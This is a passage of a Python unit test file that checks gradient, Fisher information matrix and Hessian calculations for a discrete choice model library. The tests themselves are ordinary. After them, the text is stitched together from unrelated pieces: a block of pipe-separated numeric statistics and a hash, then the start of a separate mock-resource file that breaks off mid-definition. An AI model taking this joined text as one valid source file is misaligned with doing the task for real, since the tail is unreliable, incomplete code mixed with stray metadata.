expected_gradient_weighted = 2 * expected_gradient
func_gradient_weighted = func(*gradient_args)
self.assertIsInstance(func_gradient_weighted, np.ndarray)
self.assertEqual(func_gradient_weighted.shape,
(self.fake_betas.shape[0] +
self.fake_intercepts.shape[0] +
self.fake_shapes.shape[0],))
npt.assert_allclose(func_gradient_weighted, expected_gradient_weighted)
return None
def test_create_matrix_block_indices(self):
"""
Ensure that create_matrix_block_indices returns the expected results.
"""
# Note that we have two observations, the first with three alternatives
# and the second with two alternatives.
expected_results = [np.array([0, 1, 2]), np.array([3, 4])]
# Get the results of the function being tested
results = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Test that the two sets of results are equal
self.assertIsInstance(results, list)
self.assertTrue(all([isinstance(x, np.ndarray) for x in results]))
npt.assert_allclose(expected_results[0], results[0])
npt.assert_allclose(expected_results[1], results[1])
return None
def test_robust_outer_product(self):
"""
Ensure that robust_outer_product returns the expected results.
Unfortunately, I cannot find a good case now where using the regular
outer product gives incorrect results. However without a compelling
reason to remove the function, I'll trust my earlier judgement in
creating it in the first place.
"""
# Define a vector whose outer product we want to take
x = np.array([1e-100, 0.01])
outer_product = np.outer(x, x)
robust_outer_product = cc.robust_outer_product(x, x)
# Perform the desired tests
self.assertIsInstance(robust_outer_product, np.ndarray)
self.assertEqual(robust_outer_product.shape, outer_product.shape)
npt.assert_allclose(outer_product, robust_outer_product)
return None
def test_create_matrix_blocks(self):
"""
Ensure that create_matrix_blocks returns expected results when not
having to correct for underflow.
"""
# Designate a utility transform for this test
utility_transform = mnl._mnl_utility_transform
# Collect the arguments needed for this function
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
# Get the long-format probabilities
long_probs = cc.calc_probabilities(*args, **kwargs)
# Get the matrix-block indices
matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Create the matrix block for individual 1.
matrix_block_1 = (np.diag(long_probs[:3]) -
np.outer(long_probs[:3], long_probs[:3]))
matrix_block_2 = (np.diag(long_probs[3:]) -
np.outer(long_probs[3:], long_probs[3:]))
# Create a list of the expected results
expected_results = [matrix_block_1, matrix_block_2]
# Get the function results
func_results = cc.create_matrix_blocks(long_probs, matrix_indices)
for pos, result in enumerate(func_results):
self.assertIsInstance(result, np.ndarray)
self.assertEqual(result.shape, expected_results[pos].shape)
npt.assert_allclose(result, expected_results[pos])
return None
def test_create_matrix_blocks_with_underflow(self):
"""
Ensure that create_matrix_blocks returns expected results when also
having to correct for underflow.
"""
# Get the long-format probabilities
long_probs = np.array([cc.min_comp_value,
cc.min_comp_value,
1.0,
cc.min_comp_value,
1.0])
# Get the matrix-block indices
matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Create the matrix block for individual 1.
row_1 = [cc.min_comp_value, -cc.min_comp_value, -cc.min_comp_value]
row_2 = [-cc.min_comp_value, cc.min_comp_value, -cc.min_comp_value]
row_3 = [-cc.min_comp_value, -cc.min_comp_value, cc.min_comp_value]
matrix_block_1 = np.array([row_1, row_2, row_3])
matrix_block_2 = (np.diag(long_probs[3:]) -
np.outer(long_probs[3:], long_probs[3:]))
# Assuming that no probabilities should actually be zero or one,
# the underflow guard would set the last value to a very small,
# positive number
matrix_block_2[-1, -1] = cc.min_comp_value
# Create a list of the expected results
expected_results = [matrix_block_1, matrix_block_2]
# Get the function results
func_results = cc.create_matrix_blocks(long_probs, matrix_indices)
for pos, result in enumerate(func_results):
self.assertIsInstance(result, np.ndarray)
self.assertEqual(result.shape, expected_results[pos].shape)
npt.assert_allclose(result, expected_results[pos])
return None
def test_calc_fisher_info_matrix_no_shapes_no_intercepts(self):
"""
Ensure that calc_fisher_info_matrix returns the expected values when
there are no shape or intercept parameters.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
def transform_deriv_v(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(*args):
return None
def transform_deriv_shapes(*args):
return None
# Collect the arguments for the function being tested
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
None,
None,
None,
None]
gradient_args[1] = self.fake_design[:3, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[:3]
gradient_args[3] = self.fake_rows_to_obs[:3, :]
gradient_args[4] = self.fake_rows_to_alts[:3, :]
gradient_args[5] = self.choice_array[:3]
gradient_1 = cc.calc_gradient(*gradient_args)
gradient_args[1] = self.fake_design[3:, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[3:]
gradient_args[3] = self.fake_rows_to_obs[3:, :]
gradient_args[4] = self.fake_rows_to_alts[3:, :]
gradient_args[5] = self.choice_array[3:]
gradient_2 = cc.calc_gradient(*gradient_args)
# Calcuate the BHHH approximation to the Fisher Info Matrix
expected_result = (np.outer(gradient_1, gradient_1) +
np.outer(gradient_2, gradient_2))
# Alias the function being tested
func = cc.calc_fisher_info_matrix
# Get the results of the function being tested
gradient_args[1] = self.fake_design
gradient_args[2] = self.fake_df[self.alt_id_col].values
gradient_args[3] = self.fake_rows_to_obs
gradient_args[4] = self.fake_rows_to_alts
gradient_args[5] = self.choice_array
function_result = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result.shape)
npt.assert_allclose(function_result, expected_result)
# Test the Fisher info matrix function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_result_weighted = 2 * expected_result
func_result_weighted = func(*gradient_args)
self.assertIsInstance(func_result_weighted, np.ndarray)
self.assertEqual(func_result_weighted.shape,
expected_result_weighted.shape)
npt.assert_allclose(func_result_weighted, expected_result_weighted)
# Test the function with the ridge penalty
expected_result_weighted -= 2 * self.ridge
gradient_args[-2] = self.ridge
function_result = func(*gradient_args)
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result_weighted.shape)
npt.assert_allclose(function_result, expected_result_weighted)
return None
def test_calc_fisher_info_matrix_no_intercepts(self):
"""
Ensure that calc_fisher_info_matrix returns the expected values when
there are no intercept parameters.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
def transform_deriv_v(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(*args):
return None
fake_deriv = np.exp(self.fake_shapes)[None, :]
def transform_deriv_shapes(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return rows_to_alts[:, 1:].multiply(fake_deriv)
# Collect the arguments needed to calculate the gradients
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
None,
self.fake_shapes,
None,
None]
# Get the gradient, for each observation, separately.
# Note this test expects that we only have two observations.
gradient_args[1] = self.fake_design[:3, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[:3]
gradient_args[3] = self.fake_rows_to_obs[:3, :]
gradient_args[4] = self.fake_rows_to_alts[:3, :]
gradient_args[5] = self.choice_array[:3]
gradient_1 = cc.calc_gradient(*gradient_args)
gradient_args[1] = self.fake_design[3:, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[3:]
gradient_args[3] = self.fake_rows_to_obs[3:, :]
gradient_args[4] = self.fake_rows_to_alts[3:, :]
gradient_args[5] = self.choice_array[3:]
gradient_2 = cc.calc_gradient(*gradient_args)
# Calcuate the BHHH approximation to the Fisher Info Matrix
expected_result = (np.outer(gradient_1, gradient_1) +
np.outer(gradient_2, gradient_2))
# Alias the function being tested
func = cc.calc_fisher_info_matrix
# Get the results of the function being tested
gradient_args[1] = self.fake_design
gradient_args[2] = self.fake_df[self.alt_id_col].values
gradient_args[3] = self.fake_rows_to_obs
gradient_args[4] = self.fake_rows_to_alts
gradient_args[5] = self.choice_array
function_result = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result.shape)
npt.assert_allclose(function_result, expected_result)
# Test the Fisher info matrix function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_result_weighted = 2 * expected_result
func_result_weighted = func(*gradient_args)
self.assertIsInstance(func_result_weighted, np.ndarray)
self.assertEqual(func_result_weighted.shape,
expected_result_weighted.shape)
npt.assert_allclose(func_result_weighted, expected_result_weighted)
return None
def test_calc_fisher_info_matrix_no_shapes(self):
"""
Ensure that calc_fisher_info_matrix returns the expected values when
there are no shape parameters.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
def transform_deriv_v(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return rows_to_alts[:, 1:]
def transform_deriv_shapes(*args):
return None
# Collect the arguments needed to calculate the gradients
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
self.fake_intercepts,
None,
None,
None]
# Get the gradient, for each observation, separately.
# Note this test expects that we only have two observations.
gradient_args[1] = self.fake_design[:3, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[:3]
gradient_args[3] = self.fake_rows_to_obs[:3, :]
gradient_args[4] = self.fake_rows_to_alts[:3, :]
gradient_args[5] = self.choice_array[:3]
gradient_1 = cc.calc_gradient(*gradient_args)
gradient_args[1] = self.fake_design[3:, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[3:]
gradient_args[3] = self.fake_rows_to_obs[3:, :]
gradient_args[4] = self.fake_rows_to_alts[3:, :]
gradient_args[5] = self.choice_array[3:]
gradient_2 = cc.calc_gradient(*gradient_args)
# Calcuate the BHHH approximation to the Fisher Info Matrix
expected_result = (np.outer(gradient_1, gradient_1) +
np.outer(gradient_2, gradient_2))
# Alias the function being tested
func = cc.calc_fisher_info_matrix
# Get the results of the function being tested
gradient_args[1] = self.fake_design
gradient_args[2] = self.fake_df[self.alt_id_col].values
gradient_args[3] = self.fake_rows_to_obs
gradient_args[4] = self.fake_rows_to_alts
gradient_args[5] = self.choice_array
function_result = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result.shape)
npt.assert_allclose(function_result, expected_result)
# Test the Fisher info matrix function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_result_weighted = 2 * expected_result
func_result_weighted = func(*gradient_args)
self.assertIsInstance(func_result_weighted, np.ndarray)
self.assertEqual(func_result_weighted.shape,
expected_result_weighted.shape)
npt.assert_allclose(func_result_weighted, expected_result_weighted)
return None
def test_calc_fisher_info_matrix(self):
"""
Ensure that calc_fisher_info_matrix returns the expected values.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
def transform_deriv_v(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return rows_to_alts[:, 1:]
fake_deriv = np.exp(self.fake_shapes)[None, :]
def transform_deriv_shapes(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return rows_to_alts[:, 1:].multiply(fake_deriv)
# Collect the arguments needed to calculate the gradients
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
self.fake_intercepts,
self.fake_shapes,
None,
None]
# Get the gradient, for each observation, separately.
# Note this test expects that we only have two observations.
gradient_args[1] = self.fake_design[:3, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[:3]
gradient_args[3] = self.fake_rows_to_obs[:3, :]
gradient_args[4] = self.fake_rows_to_alts[:3, :]
gradient_args[5] = self.choice_array[:3]
gradient_1 = cc.calc_gradient(*gradient_args)
gradient_args[1] = self.fake_design[3:, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[3:]
gradient_args[3] = self.fake_rows_to_obs[3:, :]
gradient_args[4] = self.fake_rows_to_alts[3:, :]
gradient_args[5] = self.choice_array[3:]
gradient_2 = cc.calc_gradient(*gradient_args)
# Calcuate the BHHH approximation to the Fisher Info Matrix
expected_result = (np.outer(gradient_1, gradient_1) +
np.outer(gradient_2, gradient_2))
# Alias the function being tested
func = cc.calc_fisher_info_matrix
# Get the results of the function being tested
gradient_args[1] = self.fake_design
gradient_args[2] = self.fake_df[self.alt_id_col].values
gradient_args[3] = self.fake_rows_to_obs
gradient_args[4] = self.fake_rows_to_alts
gradient_args[5] = self.choice_array
function_result = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result.shape)
npt.assert_allclose(function_result, expected_result)
# Test the Fisher info matrix function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_result_weighted = 2 * expected_result
func_result_weighted = func(*gradient_args)
self.assertIsInstance(func_result_weighted, np.ndarray)
self.assertEqual(func_result_weighted.shape,
expected_result_weighted.shape)
npt.assert_allclose(func_result_weighted, expected_result_weighted)
return None
def test_calc_hessian_no_shapes_no_intercept(self):
"""
Ensure that the calc_hessian function returns expected results when
there are no shape parameters and no intercept parameters.
"""
# Alias the design matrix
design = self.fake_design
# Get the matrix block indices for the test
matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Calculate the probabilities for this test.
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
probs = cc.calc_probabilities(*args, **kwargs)
# Get the matrix blocks for dP_i_dH_i
matrix_blocks = cc.create_matrix_blocks(probs, matrix_indices)
# Create the dP_dH matrix that represents the derivative of the
# long probabilities with respect to the array of transformed index
# values / systematic utilities
dP_dH = block_diag(matrix_blocks)
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
def transform_deriv_v(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(*args):
return None
def transform_deriv_shapes(*args):
return None
# Collect the arguments for the hessian function being tested
hessian_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
matrix_indices,
None,
None,
None,
None]
# Calculate the expected result
# Since we're essentially dealing with an MNL model in this test,
# the expected answer is -X^T * dP_dH * X
expected_result = (-1 * design.T.dot(dP_dH.dot(design)))
# Alias the function being tested
func = cc.calc_hessian
# Get the results of the function being tested
function_result = func(*hessian_args)
# Perform the required tests
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result.shape)
npt.assert_allclose(function_result, expected_result)
# Test the Hessian function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
hessian_args[-1] = new_weights
expected_result_weighted = 2 * expected_result
func_result_weighted = func(*hessian_args)
self.assertIsInstance(func_result_weighted, np.ndarray)
self.assertEqual(func_result_weighted.shape,
expected_result_weighted.shape)
npt.assert_allclose(func_result_weighted, expected_result_weighted)
# Test the function with the ridge penalty
expected_result_weighted -= 2 * self.ridge
hessian_args[-2] = self.ridge
function_result = func(*hessian_args)
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result_weighted.shape)
npt.assert_allclose(function_result, expected_result_weighted)
return None
def test_calc_hessian(self):
"""
Ensure that the calc_hessian function returns expected results when
there are both shape parameters and intercept parameters.
"""
# Alias the design matrix
design = self.fake_design
# Get the matrix block indices for the test
matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Calculate the probabilities for this test.
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
probs = cc.calc_probabilities(*args, **kwargs)
# Get the matrix blocks for dP_i_dH_i
matrix_blocks = cc.create_matrix_blocks(probs, matrix_indices)
# Create the dP_dH matrix that represents the derivative of the
# long probabilities with respect to the array of transformed index
# values / systematic utilities
dP_dH = block_diag(matrix_blocks)
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
def transform_deriv_v(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(sys_utilities,
alt_IDs,
rows_to_alts,
intercept_params):
return rows_to_alts[:, 1:]
fake_deriv = np.exp(self.fake_shapes)[None, :]
def transform_deriv_shapes(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return rows_to_alts[:, 1:].multiply(fake_deriv)
# Collect the arguments for the hessian function being tested
hessian_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
matrix_indices,
self.fake_intercepts,
self.fake_shapes,
None,
None]
# Calculate the derivative of the transformation vector with respect
# to the shape parameters.
args = (design.dot(self.fake_betas),
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_alts,
self.fake_shapes)
dh_d_shape = transform_deriv_shapes(*args)
# Calculate the derivative of the transformation vector with respect
# to the intercept parameters
dh_d_intercept = self.fake_rows_to_alts[:, 1:]
# Calculate the various matrices needed for the expected result
# Note dH_dV is the Identity matrix in this test.
# See the documentation pdf for a description of what each of these
# matrixes are.
# h_33 is -X^T * dP_dH * X. This is the hessian in the standard MNL
h_33 = np.asarray(-1 * design.T.dot(dP_dH.dot(design)))
# h_32 is -X^T * dH_dV^T * dP_dH * dH_d_intercept
h_32 = np.asarray(-1 * design.T.dot(dP_dH.dot(dh_d_intercept.A)))
# h_31 is -X^T * dH_dV^T * dP_dH * dH_d_shape
h_31 = np.asarray(-1 * design.T.dot(dP_dH.dot(dh_d_shape.A)))
# h_21 = -dH_d_intercept^T * dP_dH * dH_d_shape
h_21 = np.asarray(-1 * dh_d_intercept.T.dot(dP_dH.dot(dh_d_shape.A)))
# h_22 = -dH_d_intercept^T * dP_dH * dH_d_intercept
h_22 = np.asarray(-1 *
dh_d_intercept.T.dot(dP_dH.dot(dh_d_intercept.A)))
# h_11 = -dH_d_shape^T * dP_dH * dH_d_shape
h_11 = np.asarray(-1 * dh_d_shape.T.dot(dP_dH.dot(dh_d_shape.A)))
# Create the final hessian
top_row = np.concatenate((h_11, h_21.T, h_31.T), axis=1)
middle_row = np.concatenate((h_21, h_22, h_32.T), axis=1)
bottom_row = np.concatenate((h_31, h_32, h_33), axis=1)
expected_result = np.concatenate((top_row, middle_row, bottom_row),
axis=0)
# Alias the function being tested
func = cc.calc_hessian
# Get the results of the function being tested
function_result = func(*hessian_args)
# Perform the required tests
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result.shape)
self.assertFalse(isinstance(function_result,
np.matrixlib.defmatrix.matrix))
npt.assert_allclose(function_result, expected_result)
# Test the Hessian function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
hessian_args[-1] = new_weights
expected_result_weighted = 2 * expected_result
func_result_weighted = func(*hessian_args)
self.assertIsInstance(func_result_weighted, np.ndarray)
self.assertEqual(func_result_weighted.shape,
expected_result_weighted.shape)
npt.assert_allclose(func_result_weighted, expected_result_weighted)
# Test the function with the ridge penalty
expected_result_weighted -= 2 * self.ridge
hessian_args[-2] = self.ridge
function_result = func(*hessian_args)
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result_weighted.shape)
self.assertFalse(isinstance(function_result,
np.matrixlib.defmatrix.matrix))
npt.assert_allclose(function_result, expected_result_weighted)
return None
def test_calc_hessian_no_shapes(self):
"""
Ensure that the calc_hessian function returns expected results when
there are no shape parameters.
"""
# Alias the design matrix
design = self.fake_design
# Get the matrix block indices for the test
matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Calculate the probabilities for this test.
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
probs = cc.calc_probabilities(*args, **kwargs)
# Get the matrix blocks for dP_i_dH_i
matrix_blocks = cc.create_matrix_blocks(probs, matrix_indices)
# Create the dP_dH matrix that represents the derivative of the
# long probabilities with respect to the array of transformed index
# values / systematic utilities
dP_dH = block_diag(matrix_blocks)
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
def transform_deriv_v(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(sys_utilities,
alt_IDs,
rows_to_alts,
intercept_params):
return rows_to_alts[:, 1:]
def transform_deriv_shapes(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return None
# Collect the arguments for the hessian function being tested
hessian_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
matrix_indices,
self.fake_intercepts,
None,
None,
None]
# Calculate the derivative of the transformation vector with respect
# to the intercept parameters
dh_d_intercept = self.fake_rows_to_alts[:, 1:]
# Calculate the various matrices needed for the expected result
# Note dH_dV is the Identity matrix in this test.
# See the documentation pdf for a description of what each of these
# matrixes are.
# h_33 is -X^T * dP_dH * X. This is the hessian in the standard MNL
h_33 = np.asarray(-1 * design.T.dot(dP_dH.dot(design)))
# h_32 is -X^T * dH_dV^T * dP_dH * dH_d_intercept
h_32 = np.asarray(-1 * design.T.dot(dP_dH.dot(dh_d_intercept.A)))
# h_22 = -dH_d_intercept^T * dP_dH * dH_d_intercept
h_22 = np.asarray(-1 *
dh_d_intercept.T.dot(dP_dH.dot(dh_d_intercept.A)))
# Create the final hessian
middle_row = np.concatenate((h_22, h_32.T), axis=1)
bottom_row = np.concatenate((h_32, h_33), axis=1)
expected_result = np.concatenate((middle_row, bottom_row), axis=0)
# Alias the function being tested
func = cc.calc_hessian
# Get the results of the function being tested
function_result = func(*hessian_args)
# Perform the required tests
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result.shape)
self.assertFalse(isinstance(function_result,
np.matrixlib.defmatrix.matrix))
npt.assert_allclose(function_result, expected_result)
# Test the Hessian function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
hessian_args[-1] = new_weights
expected_result_weighted = 2 * expected_result
func_result_weighted = func(*hessian_args)
self.assertIsInstance(func_result_weighted, np.ndarray)
self.assertEqual(func_result_weighted.shape,
expected_result_weighted.shape)
npt.assert_allclose(func_result_weighted, expected_result_weighted)
return None
def test_calc_hessian_no_intercepts(self):
"""
Ensure that the calc_hessian function returns expected results when
there are no intercept parameters.
"""
# Alias the design matrix
design = self.fake_design
# Get the matrix block indices for the test
matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
# Calculate the probabilities for this test.
args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform]
kwargs = {"intercept_params": self.fake_intercepts,
"shape_params": self.fake_shapes,
"return_long_probs": True}
probs = cc.calc_probabilities(*args, **kwargs)
# Get the matrix blocks for dP_i_dH_i
matrix_blocks = cc.create_matrix_blocks(probs, matrix_indices)
# Create the dP_dH matrix that represents the derivative of the
# long probabilities with respect to the array of transformed index
# values / systematic utilities
dP_dH = block_diag(matrix_blocks)
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
def transform_deriv_v(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(sys_utilities,
alt_IDs,
rows_to_alts,
intercept_params):
return None
fake_deriv = np.exp(self.fake_shapes)[None, :]
def transform_deriv_shapes(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return rows_to_alts[:, 1:].multiply(fake_deriv)
# Collect the arguments for the hessian function being tested
hessian_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
matrix_indices,
None,
self.fake_shapes,
None,
None]
# Calculate the derivative of the transformation vector with respect
# to the shape parameters.
args = (design.dot(self.fake_betas),
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_alts,
self.fake_shapes)
dh_d_shape = transform_deriv_shapes(*args)
# Calculate the various matrices needed for the expected result
# Note dH_dV is the Identity matrix in this test.
# See the documentation pdf for a description of what each of these
# matrixes are.
# h_33 is -X^T * dP_dH * X. This is the hessian in the standard MNL
h_33 = np.asarray(-1 * design.T.dot(dP_dH.dot(design)))
# h_31 is -X^T * dH_dV^T * dP_dH * dH_d_shape
h_31 = np.asarray(-1 * design.T.dot(dP_dH.dot(dh_d_shape.A)))
# h_11 = -dH_d_shape^T * dP_dH * dH_d_shape
h_11 = np.asarray(-1 * dh_d_shape.T.dot(dP_dH.dot(dh_d_shape.A)))
# Create the final hessian
top_row = np.concatenate((h_11, h_31.T), axis=1)
bottom_row = np.concatenate((h_31, h_33), axis=1)
expected_result = np.concatenate((top_row, bottom_row), axis=0)
# Alias the function being tested
func = cc.calc_hessian
# Get the results of the function being tested
function_result = func(*hessian_args)
# Perform the required tests
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result.shape)
npt.assert_allclose(function_result, expected_result)
# Test the Hessian function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
hessian_args[-1] = new_weights
expected_result_weighted = 2 * expected_result
func_result_weighted = func(*hessian_args)
self.assertIsInstance(func_result_weighted, np.ndarray)
self.assertEqual(func_result_weighted.shape,
expected_result_weighted.shape)
npt.assert_allclose(func_result_weighted, expected_result_weighted)
return None
| 44.34607
| 79
| 0.602422
| 9,551
| 81,242
| 4.859282
| 0.048267
| 0.062054
| 0.027149
| 0.031674
| 0.836073
| 0.807072
| 0.791967
| 0.779427
| 0.76721
| 0.762298
| 0
| 0.010648
| 0.32722
| 81,242
| 1,831
| 80
| 44.370289
| 0.838468
| 0.23782
| 0
| 0.773169
| 0
| 0
| 0.01889
| 0
| 0
| 0
| 0
| 0
| 0.11827
| 1
| 0.055605
| false
| 0
| 0.010591
| 0.033539
| 0.123566
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98d3fbf1fd5c3c8b55d719cd5ca105b240724c1f
| 5,274
|
py
|
Python
|
atlas/foundations_core_rest_api_components/src/test/helpers/api_resource_mocks.py
|
DeepLearnI/atlas
|
8aca652d7e647b4e88530b93e265b536de7055ed
|
[
"Apache-2.0"
] | 296
|
2020-03-16T19:55:00.000Z
|
2022-01-10T19:46:05.000Z
|
atlas/foundations_core_rest_api_components/src/test/helpers/api_resource_mocks.py
|
DeepLearnI/atlas
|
8aca652d7e647b4e88530b93e265b536de7055ed
|
[
"Apache-2.0"
] | 57
|
2020-03-17T11:15:57.000Z
|
2021-07-10T14:42:27.000Z
|
atlas/foundations_core_rest_api_components/src/test/helpers/api_resource_mocks.py
|
DeepLearnI/atlas
|
8aca652d7e647b4e88530b93e265b536de7055ed
|
[
"Apache-2.0"
] | 38
|
2020-03-17T21:06:05.000Z
|
2022-02-08T03:19:34.000Z
|
class APIResourceMocks(object):
def index(self):
from foundations_core_rest_api_components.lazy_result import LazyResult
from foundations_core_rest_api_components.response import Response
def _index():
return 'some data'
return Response('Mock', LazyResult(_index))
class Mock(object):
pass
class MockWithIndex(object):
def index(self):
